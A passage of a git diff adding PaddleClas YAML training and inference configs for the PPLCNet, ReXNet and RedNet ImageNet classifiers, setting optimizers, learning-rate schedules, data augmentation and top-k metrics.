cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_75.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_75.yaml new file mode 100644 index 0000000..24ad8f3 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_75.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + class_num: 1000 + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference +# model architecture +Arch: + name: PPLCNet_x0_75 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.8 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x1_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x1_0.yaml new file mode 100644 index 0000000..0921db5 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x1_0.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + class_num: 1000 + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference +# model architecture +Arch: + name: PPLCNet_x1_0 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.8 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x1_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x1_5.yaml new file mode 100644 index 0000000..290d1c0 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x1_5.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + class_num: 1000 + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference +# model architecture +Arch: + name: PPLCNet_x1_5 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.8 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x2_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x2_0.yaml new file mode 100644 index 0000000..c8f7a3c --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x2_0.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + class_num: 1000 + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference +# model architecture +Arch: + name: PPLCNet_x2_0 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.8 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x2_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x2_5.yaml new file mode 100644 index 0000000..2ea69e3 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x2_5.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + class_num: 1000 + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference +# model architecture +Arch: + name: PPLCNet_x2_5 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.8 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_1_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_1_0.yaml new file mode 100644 index 0000000..9406bfe --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_1_0.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: ReXNet_1_0 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_1_3.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_1_3.yaml new file mode 100644 index 0000000..9f0b529 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_1_3.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: ReXNet_1_3 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_1_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_1_5.yaml new file mode 100644 index 0000000..09a86cf --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_1_5.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: ReXNet_1_5 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_2_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_2_0.yaml new file mode 100644 index 0000000..52336cd --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_2_0.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: ReXNet_2_0 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_3_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_3_0.yaml new file mode 100644 index 0000000..d1598fc --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_3_0.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: ReXNet_3_0 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet101.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet101.yaml new file mode 100644 index 0000000..ca64ec8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/RedNet/RedNet101.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: RedNet101 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0 + mean: [123.675, 116.28, 103.53] + std: [58.395, 57.12, 57.375] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: 